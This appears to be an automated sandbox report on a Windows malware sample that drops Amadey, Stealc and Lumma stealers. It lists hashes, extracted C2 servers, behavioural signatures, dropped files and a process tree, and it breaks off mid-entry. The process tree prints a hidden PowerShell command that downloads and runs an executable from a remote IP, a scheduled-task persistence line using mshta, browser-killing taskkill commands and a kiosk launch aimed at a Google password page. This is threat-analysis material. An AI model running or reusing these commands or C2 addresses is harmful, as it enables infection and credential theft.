Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/02/2025, 02:17

General

  • Target

    6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe

  • Size

    2.1MB

  • MD5

    6bc335ae3e7281ea3e46c5362fc2257a

  • SHA1

    7c82356ab52d44d4c3682578e143c1663695018d

  • SHA256

    6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e

  • SHA512

    c92a6d620c89d7243acfc989c9c74c9e40c7b6199974e9cc0b47561d2621f2c4520d1047ba9bc3b7b787ccd8ebeeec65a398f7763c225896803b0593e1fc5413

  • SSDEEP

    49152:iEfX+HJ9H1gO5nNcx/sygkWIA9XqHEwvece8tWNgLPHalhWm:Klt5nuJsyPOaEwGcztWObHYW

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://prideforgek.fun/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 4 IoCs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 35 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe
    "C:\Users\Admin\AppData\Local\Temp\6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3120
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4724
      • C:\Users\Admin\AppData\Local\Temp\1091068001\5f67879656.exe
        "C:\Users\Admin\AppData\Local\Temp\1091068001\5f67879656.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2664
      • C:\Users\Admin\AppData\Local\Temp\1091069001\dd57305fdb.exe
        "C:\Users\Admin\AppData\Local\Temp\1091069001\dd57305fdb.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4864
      • C:\Users\Admin\AppData\Local\Temp\1091070001\c439be9a28.exe
        "C:\Users\Admin\AppData\Local\Temp\1091070001\c439be9a28.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:4296
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2308
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4876
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4856
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3820
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4672
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:116
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
            5⤵
            • Checks processor information in registry
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2272
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1880 -prefMapHandle 1876 -prefsLen 27434 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eec4270c-9bf4-4fbd-a9f2-dce461a5b8b3} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" gpu
              6⤵
                PID:744
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2404 -parentBuildID 20240401114208 -prefsHandle 2396 -prefMapHandle 2384 -prefsLen 28354 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d18db93d-63a9-46d5-af65-e26612ad17ad} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" socket
                6⤵
                  PID:2584
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3000 -childID 1 -isForBrowser -prefsHandle 3052 -prefMapHandle 2760 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f9ce8b6c-dfa0-46ad-8240-2957ecdb434f} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" tab
                  6⤵
                    PID:2384
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3984 -childID 2 -isForBrowser -prefsHandle 3976 -prefMapHandle 3968 -prefsLen 32844 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {146e2312-d117-4645-b4df-c7bdf6442a2e} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" tab
                    6⤵
                      PID:4908
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4632 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4628 -prefMapHandle 4560 -prefsLen 32844 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4140c61e-f439-463f-abea-a0ede4de6ed5} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" utility
                      6⤵
                      • Checks processor information in registry
                      PID:4884
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5500 -childID 3 -isForBrowser -prefsHandle 5492 -prefMapHandle 5488 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1a64837-b81d-47a9-8cfd-a1cb6e363f39} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" tab
                      6⤵
                        PID:5944
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5644 -childID 4 -isForBrowser -prefsHandle 5720 -prefMapHandle 5716 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {71fa6f38-183e-49d4-baa7-caa82576529e} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" tab
                        6⤵
                          PID:5956
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5900 -childID 5 -isForBrowser -prefsHandle 5820 -prefMapHandle 5824 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {afc27da3-cc52-40ab-986a-8a7a6c32adf1} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" tab
                          6⤵
                            PID:5968
                    • C:\Users\Admin\AppData\Local\Temp\1091071001\f5cfb617ee.exe
                      "C:\Users\Admin\AppData\Local\Temp\1091071001\f5cfb617ee.exe"
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      • Suspicious use of WriteProcessMemory
                      PID:4732
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c schtasks /create /tn sLOFHma7ZbE /tr "mshta C:\Users\Admin\AppData\Local\Temp\f1sa0cG0E.hta" /sc minute /mo 25 /ru "Admin" /f
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:5088
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /tn sLOFHma7ZbE /tr "mshta C:\Users\Admin\AppData\Local\Temp\f1sa0cG0E.hta" /sc minute /mo 25 /ru "Admin" /f
                          5⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:4036
                      • C:\Windows\SysWOW64\mshta.exe
                        mshta C:\Users\Admin\AppData\Local\Temp\f1sa0cG0E.hta
                        4⤵
                        • Checks computer location settings
                        • System Location Discovery: System Language Discovery
                        PID:4180
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'J1UG3HXFK114WTN5VDF0RYLUVYISIFR3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                          5⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • Downloads MZ/PE file
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2940
                          • C:\Users\Admin\AppData\Local\TempJ1UG3HXFK114WTN5VDF0RYLUVYISIFR3.EXE
                            "C:\Users\Admin\AppData\Local\TempJ1UG3HXFK114WTN5VDF0RYLUVYISIFR3.EXE"
                            6⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:5124
                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                  1⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1704
                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                  1⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5280
                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                  1⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4828

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\activity-stream.discovery_stream.json.tmp

                  Filesize

                  22KB

                  MD5

                  fc85bbcab59217a262abd733fe0a3eb0

                  SHA1

                  8641dd51805dc9e0806dac2ae1bd99c34b213328

                  SHA256

                  87d75d993b8b9386e6264cb58f35f676971d45ab41f1ee558ec00ea8641a48be

                  SHA512

                  69431e5312213026f2426fb85f3c346491e921022ae45ae654016d8b872b1842590e669d6fb831359fddb6874806ae983185e64e6a71c1451e03a11710d7c34e

                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

                  Filesize

                  13KB

                  MD5

                  af6aab82381f8d9c8159bb2fdb8d7c05

                  SHA1

                  7cb5136dd32d895722368a504300824b57161a4f

                  SHA256

                  5b62e96bc25c5bd88065c72805a8787954a776f9c7a2a534f064ff84b1e9ae9d

                  SHA512

                  d2e6f403b31c317b77a11b7853116245c8c81d933b3abfb81871d454f76220e315dd1370502636f4d9117b55457df590a5cdb4406c7f516f2731056e45ec75e8

                • C:\Users\Admin\AppData\Local\TempJ1UG3HXFK114WTN5VDF0RYLUVYISIFR3.EXE

                  Filesize

                  3.0MB

                  MD5

                  d136cc65ffe40d4091824414bb5e1abf

                  SHA1

                  22bca964e334a14cad57139dacb45286a84576d0

                  SHA256

                  4766a865d7ed625e6ea5379dc8c75dcf34d95b7c8b452b397af2fd2bc1187c12

                  SHA512

                  a064921a711185d98bb6cc3fe615a6017c89e2fe6f47711b9afcc047a853fc04104b9811e398b2b5d48ba1b2b5dd272167bffb6a9f36f759e04659062163896c

                • C:\Users\Admin\AppData\Local\Temp\1091068001\5f67879656.exe

                  Filesize

                  2.0MB

                  MD5

                  409990ebde209cb33baa9b9a8a9af745

                  SHA1

                  7a93d7184547a3c6ef1459260a4af39214d84e4c

                  SHA256

                  30aa6dab39701a0c677d5e0aae09c80fdc73c3e6f78a00361325b267384e8b88

                  SHA512

                  c40d72b1b813cd854e704d7eba9c7ace9149e106e381806a4af113991f7a98a930126f112924103b93bcf785d013282547bfa78ebae500936935cf05fb01ae81

                • C:\Users\Admin\AppData\Local\Temp\1091069001\dd57305fdb.exe

                  Filesize

                  1.8MB

                  MD5

                  9bad3775f7a3115971d323a47fe47663

                  SHA1

                  c72b399d93767ca10dd4baefb8721dac94159af0

                  SHA256

                  a75e6f408d9ff472c4826b8c0fd2d0c486e0127b6329dbdf49bc1b7f4f7fb879

                  SHA512

                  752ada1e4c9af2b67298f57f6ecab94326aed4848704ac390268aac85f6e5e7ba572a8f59aedd34126f173f38fe453d7dc2e5f8ca0316033d4fbc1ff2eab7b89

                • C:\Users\Admin\AppData\Local\Temp\1091070001\c439be9a28.exe

                  Filesize

                  941KB

                  MD5

                  1e3b36c8901289496bb4ba43e441e052

                  SHA1

                  ee4c5e28e875315bfcdc6ea4501a36c28fe8eab0

                  SHA256

                  04f00fa9549d6b549c93f3970f76fbb231acbfa8df780a1b04b2c866169dcbf9

                  SHA512

                  142f653d4f04977ef344c743f242be3640f862856e8c3f75cf6f3e68e1643f98fe5d6f039fa0efb59303f1d326d732987d73fec82371a45b1856a23ddb1e94a2

                • C:\Users\Admin\AppData\Local\Temp\1091071001\f5cfb617ee.exe

                  Filesize

                  938KB

                  MD5

                  9874fa9d50c41490b97a030e30f27ef5

                  SHA1

                  a51139861865d24a09d40bcc4436ded299a9cce4

                  SHA256

                  b91772ec7e03b5c19939f0ba7d48de146a71713813c5b78000aa804153b1ca4e

                  SHA512

                  f9f1eb87b4ada0b31e3c455109932a1b0567ed7e63083b5cec67ca925f544b170689dce68b7ffed1b4731ed456544887fe5b0b0a82dd35f19ab47f2736f4ebb1

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jnqixea3.bkb.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

                  Filesize

                  2.1MB

                  MD5

                  6bc335ae3e7281ea3e46c5362fc2257a

                  SHA1

                  7c82356ab52d44d4c3682578e143c1663695018d

                  SHA256

                  6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e

                  SHA512

                  c92a6d620c89d7243acfc989c9c74c9e40c7b6199974e9cc0b47561d2621f2c4520d1047ba9bc3b7b787ccd8ebeeec65a398f7763c225896803b0593e1fc5413

                • C:\Users\Admin\AppData\Local\Temp\f1sa0cG0E.hta

                  Filesize

                  720B

                  MD5

                  fa02951b9491aaf794a37c409271f702

                  SHA1

                  8c250ab1094b2dd7ae6e68aa3279934ff7b83d7b

                  SHA256

                  fb757a891202da6173dece9d52c5dcdb3ac2abd9c13f61ea195145f28e208438

                  SHA512

                  e771af96cf1335a60d8b47848e95e9476c64c2e90e92e782309bce9c39e73d864fab465598d7dcb4ce4c1c1392a5beb0765ce801dfbb4972f72c1974b3bbfb6e

                • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                  Filesize

                  479KB

                  MD5

                  09372174e83dbbf696ee732fd2e875bb

                  SHA1

                  ba360186ba650a769f9303f48b7200fb5eaccee1

                  SHA256

                  c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

                  SHA512

                  b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

                • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                  Filesize

                  13.8MB

                  MD5

                  0a8747a2ac9ac08ae9508f36c6d75692

                  SHA1

                  b287a96fd6cc12433adb42193dfe06111c38eaf0

                  SHA256

                  32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

                  SHA512

                  59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin

                  Filesize

                  18KB

                  MD5

                  401cbc95497b9b10fdbb25b1f7a4819d

                  SHA1

                  b3dd76a8d90521d68afd26abf57e0882ddf3150b

                  SHA256

                  ec3c036a13ad858ecbd935283a5f6d354ed3c76b845c505c8184baa64af1f13f

                  SHA512

                  33b4469afa52b720c33d3ac615a4eb1482c2f7a65da2a238b8b455413389120a0106e47b606e9d0fbee5c1e4bae5c6d9dc5d3cc588e8f1efc3c38c518b2e2724

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin

                  Filesize

                  8KB

                  MD5

                  5c4c5e524c775d8ee9ff452dad281d72

                  SHA1

                  d0f3526a9c56e20076bbec40f41ad3d8954c0f17

                  SHA256

                  cbfa78064be633310ae807835f7b9a97660b8650d28d502942b5c6097101f7ea

                  SHA512

                  fc7030d07c9ed01a5f63534dd76e63cf4b56f6a4bef36bda8ddc28bf7cb636ad8ef6592eaaa92dd930e4991ae7daa9e1f2c2552bcc10a2e09c62476812f1288c

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin

                  Filesize

                  13KB

                  MD5

                  b8a41a3979ac4bf9fb16010edb9a9678

                  SHA1

                  bb681c1d0039b82df18780fc9f445a6abd6d2286

                  SHA256

                  495683f287000f961f2cd29ee260835d551373a1c39badfd6d96fcbf7dd97537

                  SHA512

                  baf005290e03a7b73b81294198529842e27f090e518a9c328ddaa5f3a935d3588cf38b22edb624d7bf0fc52aa1d0ff3b5dd71cb61ecd4c47ceda0f51f2e8b452

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp

                  Filesize

                  25KB

                  MD5

                  514ce95c4b1065ea6f16bde21001f70a

                  SHA1

                  2e88c0e1c585a18c2d18fcafea64c695e169f522

                  SHA256

                  08e19632ab9e7aa4fd497c18a05e907f3a6b6fc02652cfcfd38b3ad22545fbea

                  SHA512

                  16dbe67ef2ed875157295f9970fdcaf66c2b518ebcd2759b89831f0635396be883b58132431c675e67b4144a025c5eaebc998ac161d96fb96915821d8727fc71

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp

                  Filesize

                  22KB

                  MD5

                  314a3c94cf93ece229bf11b4d73bb109

                  SHA1

                  9a77ec0b9503d6447728fa26d1d5897581c432b5

                  SHA256

                  5abeadcd88b265a92d95b5652fc4480ad2fc0f17e6e7d56de438e56c4d1a4bcf

                  SHA512

                  be3b0e347dcd957b311d28d1b73ddc9be654c002264d5f86b56aa9ed936b56e7e07b49ff405adc340633d1f81475de42d4b381b285fbf86c87d51a9b6f836674

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\5ef6c59c-ab54-46ea-ad56-5a618c583d3f

                  Filesize

                  982B

                  MD5

                  6f1369b155733692c00c36e79725ba65

                  SHA1

                  94b36b32f6bb64aef040693908285882ed354a9a

                  SHA256

                  26841bc7369bfdead03b87fcad79fbf384ccf218a9493962a00f633254264d16

                  SHA512

                  1dd06f7080704ea2833ac715e913a865ad0b3e8d481b55287582a30e11f675c29535bf0527e85f04aae99ec1a5f1ecbea45469748d1ecf9b38883c5ed065796f

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\ed7bdbfe-9431-4d06-8e29-953cfc20d2e3

                  Filesize

                  659B

                  MD5

                  4ce7d37870d0abdf3a3d7f4e0ca30af5

                  SHA1

                  60a3c7e0c96390b5ad71fa2eb2f798924607a148

                  SHA256

                  6df127773a2750bfb26a3cf58486c95ee3bc481ad6015ecd8c83fb45fc805bf9

                  SHA512

                  4e19f4d76e50b42bdb2a8fdc98b9190abfd2daa6b82df86074be512a54efaffd5feaab46194e8554b813ac5c920113e9c82b70605115370b42d46acd646a3fe4

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                  Filesize

                  1.1MB

                  MD5

                  842039753bf41fa5e11b3a1383061a87

                  SHA1

                  3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                  SHA256

                  d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                  SHA512

                  d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                  Filesize

                  116B

                  MD5

                  2a461e9eb87fd1955cea740a3444ee7a

                  SHA1

                  b10755914c713f5a4677494dbe8a686ed458c3c5

                  SHA256

                  4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                  SHA512

                  34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                  Filesize

                  372B

                  MD5

                  bf957ad58b55f64219ab3f793e374316

                  SHA1

                  a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                  SHA256

                  bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                  SHA512

                  79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                  Filesize

                  17.8MB

                  MD5

                  daf7ef3acccab478aaa7d6dc1c60f865

                  SHA1

                  f8246162b97ce4a945feced27b6ea114366ff2ad

                  SHA256

                  bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                  SHA512

                  5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs-1.js

                  Filesize

                  10KB

                  MD5

                  4f4cedeaf9ca363854c7f47a17e06df4

                  SHA1

                  6bc571ca8fdb96acb79096c579fc506bef9db052

                  SHA256

                  9a5488d68d082830a4c99f15b1f26b4e9eff7983e158b71f2a85e9a2ec21c19e

                  SHA512

                  4f60ab0c300566058f89ec37484f1db3ccd73f1bace093f12465c01bc1cf8db76a76a47e342e85b09af702e77c694f74d00723178480c104f0e862714e1130dd

                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs-1.js

                  Filesize

